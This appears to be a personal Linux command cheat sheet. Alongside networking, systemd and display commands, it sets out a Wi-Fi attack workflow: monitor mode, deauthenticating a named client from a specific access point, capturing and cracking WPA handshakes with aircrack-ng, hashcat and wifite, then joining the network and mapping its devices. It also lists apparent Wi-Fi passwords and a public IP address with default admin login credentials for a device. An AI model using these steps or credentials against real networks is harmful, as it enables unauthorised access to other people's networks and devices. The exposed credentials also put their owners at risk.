apt install net-tools
sudo netstat -tulpen
sudo netstat -atupen | grep ESTABLISHED
sudo lsof -nP -i ==> check connections
========= works on pi3+ ==================
iface eth0 inet static
    address 192.168.0.125/24
    gateway 192.168.0.1
==========================================
-- SYSTEMCTL USEFUL
sudo systemctl --type=service --state=running
sudo systemctl start NetworkManager

invesigate wanip when connected
dig www.xxx.com will return DnS entries hostname+
pi3+ interface name??wlxd037451257c6??
check bookmarks => MAKE  BACKUP SD CARD FIRST!!!



SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="d0:37:45:12:57:c6" , 
	ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNEL=="wlan*", NAME="wlan1"
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="b8:27:eb:fe:de:42" ,
        KERNEL=="wlan*", NAME="wlan0"

sudo ifconfig wlan1 down
sudo iwconfig wlan1 mode monitor
sudo ifconfig wlan1  up
**switch twice for monitor :?
airodump-ng -w step1 --output-format csv wlan1
play -v0.2 -q ding.wav
sudo airodump-ng wlan1
sudo airodump-ng wlan1 --bssid B8:A3:86:A0:F7:C8 --channel 3
sudo iwconfig wlan1 channel 3
sudo aireplay-ng --deauth 6 -c 9C:FC:01:11:F0:4B -a B8:A3:86:A0:F7:C8 wlan1 
	(--test?)



sudo service networking restart
         sudo /etc/init.d/networking restart
         or
         nmcli device set [device] managed true



sudo hostnamectl set-hostname xxxxxxx
hostname
hostnamectl

telnet 127.0.0.1 25
>> ehlo 127.0.0.1
>>mailfrom: <me@overhere.local>
>> rcpto: <yakyak@there.site>


KALI ARP https://www.youtube.com/watch?v=ns7TYxNcYBM
KALI WIFI WPA2 https://www.youtube.com/watch?v=WfYxrLaqlN8
KALI traceroute https://linuxconfig.org/how-to-use-traceroute-on-kali-linux

python -m pyftpdlib -w -u "user" -P "pwd" (CREATE QUICK FTP SERVER)

sudo airmon-ng start wlan1
netdiscover -r 192..../x -s x(ms) /? -i iface
sudo airodump-ng wlan1 => list avail net; look/locate bssid/essid with connected wks
== same == sudo wash -i wlan1 -s -a -U -p -u
sudo besside-ng wlan1 -c ?xchannel? -b ?xbssid?
<OWNED> message: capture is done
Crack the wpa.cap file hashcat or aircrack-ng
Connect the new wifi and map the devices
STOP MONITOR MODE 
sudo airmon-ng stop wlan1
sudo arp-scan -l -I wlan1
arp -v -e -H ether | grep "C"

sudo iwlist wlan0 scan | grep -i "essid"

hidden wifi
sudo aireplay-ng --deauth 0 -a xx:xx:xx... wlan1
(-a because replay option: access-point)

-- whatweb
-- wappylyzer
-- nmap
-- tcpdump
-- changeme (GOOD find default usernames)
-- tcpick
-- tshark


read .pcap
sudo tshark -r reaver_output.pcap -V | less

sudo wifite --dict dico.txt -i wlan1 -c ?x? --crack --cracked --check hs/*.cap


sudo nmap 192.168.0.1 --script=vulners.nse -sV
sudo tcpick
tshark -r | grep "Host Name:s"

wu/WU	12341234
HTCPortableHotspot38D2 jjjj9999
http://114.32.4.136:80 namu/uname/pwd=>icatch/admin/123456




SCREENS
xrandr --output eDP-1 --auto
xrandr --output eDP-1 --off
xrandr --output eDP-1 --panning 1920x1080+1920+0
xrandr --output VGA-1 --primary


eDP-1 connected 1920x1080+1920+0
VGA-1 connected primary 1920x1080+0+0

arwat ayètè